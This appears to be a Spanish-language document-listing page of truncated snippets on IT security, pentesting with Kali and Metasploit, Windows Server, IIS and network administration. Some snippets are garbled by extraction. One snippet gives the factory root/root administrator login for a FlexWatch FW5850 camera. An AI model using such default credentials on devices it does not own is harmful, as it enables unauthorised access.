info.uruguay@isec-global.com 4342-4685 4342-2079 4342-5440 www.isec-global.com thical Ethical La permanente exposición al riesgo de robo, extravío, alteración o delitos sobre la información confidencial de las empresas, las sitúa en una posición bastante delicada y critica, por lo

Más detalles

PENTESTING CON KALI LINUX

PENTESTING CON KALI LINUX PENTESTING CON KALI LINUX Antecedentes Debido a la dependencia actual en la tecnología, las empresas no se pueden dar el lujo de desproteger el acceso a sus redes y sistemas con el riesgo de ver comprometida

Más detalles

Proyecto Fin de Carrera

Proyecto Fin de Carrera Proyecto Fin de Carrera Capítulo 2: Memoria Descriptiva Página 15 de 265 Capítulo 2: Memoria Descriptiva 3. Objetivo del proyecto En este proyecto se desarrolla una aplicación basada en algunas de las

Más detalles

Dirección General de Educación Superior Tecnológica INSTITUTO TECNOLÓGICO DE SALINA CRUZ

Dirección General de Educación Superior Tecnológica INSTITUTO TECNOLÓGICO DE SALINA CRUZ Dirección General de Educación Superior Tecnológica INSTITUTO TECNOLÓGICO DE SALINA CRUZ UNIDAD 5: ETERNETH ACTIVIDAD: REPORTE CAPITULO 11 CONFIGURACION Y VERIFICACION DE UNA RED MATERIA: FUNDAMENTOS DE

Más detalles

Usuario y contraseña de fábrica FW5850 ID de administrador Contraseña de administrador root

Usuario y contraseña de fábrica FW5850 ID de administrador Contraseña de administrador root Guía de configuración Dirección IP FlexWatch Explorer Equipos FlexWatch TM 5850 Usuario y contraseña de fábrica FW5850 ID de administrador root Contraseña de administrador root 1 +[Antes de comenzar realice

Más detalles

i r s i d PENTEST 1 v e

i r s i d PENTEST 1 v e i r u g e S e d o Curs d a d i l i b i n o p s i d ra o L P E C a t l a y d a d lla) i v e S ( del Río PENTEST 1 Licencia Estas diapositivas han sido realizadas para el curso Seguridad y Alta Disponibilidad

Más detalles

Capítulo 2 Roles y características

Capítulo 2 Roles y características 17 Capítulo 2 Roles y características 1. Introducción Roles y características Los siguientes roles y características son una pequeña lista de aquellos presentes en Windows Server 2012. 2. Roles Desde Windows

Más detalles

Crear un servidor Web en IIS

Crear un servidor Web en IIS Crear un servidor Web en IIS Qué es un servidor web? Un servidor web es un programa que se ejecuta continuamente en un computador, manteniéndose a la espera de peticiones de ejecución que le hará un cliente

Más detalles

Cualidades de la seguridad de la información 59 Metodología para mejorar la seguridad de la información 61 Retos en la seguridad de la información 66

Cualidades de la seguridad de la información 59 Metodología para mejorar la seguridad de la información 61 Retos en la seguridad de la información 66 Índice Índice 1 Introducción 10 Para quién es este libro? 11 Estructura del libro 12 Cómo obtener ayuda 15 Fundamentos 15 Linux 16 Terminal de Linux 18 Instalando herramientas 23 Interfaz de red 26 Redes,

Más detalles

MetaSploit, tomar control de equipos remotos

MetaSploit, tomar control de equipos remotos MetaSploit, tomar control de equipos remotos MetaSploit es una suite o conjunto de programas en realidad. Está diseñada para explotar las vulnerabilidades de los equipos y es sin duda el programa más usado

Más detalles

Roles y características

Roles y características 15 Capítulo 1 Roles y características 1. Organización del libro Roles y características El libro se compone de 18 capítulos, que presentan las distintas características del sistema operativo Windows Server

Más detalles

[ MANUAL PARA USUARIOS DE GNU/LINUX ]

[ MANUAL PARA USUARIOS DE GNU/LINUX ] HISPASEC PINKERTON [ MANUAL PARA USUARIOS DE GNU/LINUX ] Presentacion Pinkerton es un software desarrollado y facilitado por Hispasec Sistemas para realizar un análisis sobre la seguridad del sistema informático

Más detalles

Manual de Usuario: Servidor Cloud y Servidor Cloud Gestionado

Manual de Usuario: Servidor Cloud y Servidor Cloud Gestionado Manual de Usuario: Servidor Cloud y Servidor Cloud Gestionado Versión 2.0 1. Contenidos Guía de Inicio 1 Qué es Servidor Cloud?... 3 2 Acceso al panel de control... 3 3 Acceso al Servidor Cloud... 5 4

Más detalles

rede corporativa manual del usuario remoto para Windows

rede corporativa manual del usuario remoto para Windows en este manual encontrarás la información necesaria para instalar y configurar el acceso remoto a la red corporativa privada teléfono_internet_televisión página 2 de 11 1 introducción... 4 2 acceso a aplicaciones

Más detalles

CURSO ADMINISTRACIÓN WEB SEMANA 6 SEGURIDAD EN REDES

CURSO ADMINISTRACIÓN WEB SEMANA 6 SEGURIDAD EN REDES CURSO ADMINISTRACIÓN WEB SEMANA 6 SEGURIDAD EN REDES Qué es la seguridad de redes? Es garantizar que el funcionamiento de todas las máquinas de una red sea óptimo y que todos los usuarios de estas máquinas

Más detalles

REUNIÓN DE PARTICIPANTES SEN - SESIÓN TÉCNICA - SISTEMA ELECTRÓNICO DE NEGOCIACIÓN

REUNIÓN DE PARTICIPANTES SEN - SESIÓN TÉCNICA - SISTEMA ELECTRÓNICO DE NEGOCIACIÓN REUNIÓN DE PARTICIPANTES SEN - SESIÓN TÉCNICA - SISTEMA ELECTRÓNICO DE NEGOCIACIÓN Marzo 9 de 2016 AGENDA 1. Requerimientos de Hardware 2. Requerimientos de Software 3. Actualización tecnológica de las

Más detalles

: COMPUTACIÓN E INFORMATICA : Ingeniería de Redes y Comunicaciones : Técnicas de Hacking : Z-RED109

: COMPUTACIÓN E INFORMATICA : Ingeniería de Redes y Comunicaciones : Técnicas de Hacking : Z-RED109 I. DATOS INFORMATIVOS Carrera Especialidad Curso Código Ciclo : Sexto Requisitos Duración Horas Semana : 08 horas Versión : v.0109 II. SUMILLA: : COMPUTACIÓN E INFORMATICA : Ingeniería de Redes y Comunicaciones

Más detalles

Stellar Phoenix JPEG Repair 5.0. Guía de instalación

Stellar Phoenix JPEG Repair 5.0. Guía de instalación Stellar Phoenix JPEG Repair 5.0 Guía de instalación Visión General Stellar Phoenix JPEG Repair ofrece una solución completa para reparar fotografías y archivos de imagen que estén corruptos. Puede reparar

Más detalles

Criptografía y Seguridad de Datos Intrusos y virus

Criptografía y Seguridad de Datos Intrusos y virus Criptografía y Seguridad de Datos Intrusos y virus Carlos Figueira. Carlos Figueira. Universidad Simón Bolívar Basado en láminas del Profesor Henric Johnson (http://www.its.bth.se/staff/hjo/ henric.johnson@bth.se)

Más detalles

Su uso esta muy extendido en Internet, siendo la nomenclatura mas utilizada la de servidor web. Hay muchos servidores en Internet y muchos tipos de

Su uso esta muy extendido en Internet, siendo la nomenclatura mas utilizada la de servidor web. Hay muchos servidores en Internet y muchos tipos de SERVIDORES Introducción En informática el término servidor alude a una computadora remota a la que los navegadores le solicitan datos desde otras computadoras. Además, los servidores pueden almacenar información

Más detalles

En este documento se detallan las diversas formas de actualizar la versión de firmware de los equipos ZyXEL.

En este documento se detallan las diversas formas de actualizar la versión de firmware de los equipos ZyXEL. Pág. 1/24 En este documento se detallan las diversas formas de actualizar la versión de firmware de los equipos ZyXEL. En los siguientes puntos vamos a comentar las diferentes formas de hacerlo: 1.- Mediante

Más detalles

WINDOWS SERVER 2008 CORE

WINDOWS SERVER 2008 CORE WINDOWS SERVER 2008 CORE INTRODUCCION Una de las características mas importantes de Windows Server 2008, es la instalación como Server Core. Este tipo de instalación nos permite tener lo estrictamente

Más detalles

Servicio de Informática Vicerrectorado de Tecnologías de la Información y la Comunicación. Guía de usuario del servicio de Aula Virtual

Servicio de Informática Vicerrectorado de Tecnologías de la Información y la Comunicación. Guía de usuario del servicio de Aula Virtual Vicerrectorado de Tecnologías de la Información y la Guía de usuario del servicio de Aula Virtual Última Actualización 14 de Enero de 2019 Tabla de contenido 1.- INTRODUCCIÓN... 3 2.- ACCESO AL SERVICIO...

Más detalles

PRACTICA FINAL. Diseño e implementación de un servidor FTP básico y cliente ftp. Protocolo FTP-RC

PRACTICA FINAL. Diseño e implementación de un servidor FTP básico y cliente ftp. Protocolo FTP-RC PRACTICA FINAL Diseño e implementación de un servidor FTP básico y cliente ftp Descripción de la práctica Protocolo FTP-RC Se propone desarrollar un servidor FTP básico iterativo (sólo atiende a un cliente

Más detalles

Seguridad informática y Malwares Análisis de amenazas e implementación de contramedidas

Seguridad informática y Malwares Análisis de amenazas e implementación de contramedidas Identificación de un malware 1. Presentación de los malwares por familias 9 1.1 Introducción 9 1.2 Backdoor 10 1.3 Ransomware y locker 11 1.4 Stealer 12 1.5 Rootkit 13 2. Escenario de infección 14 2.1

Más detalles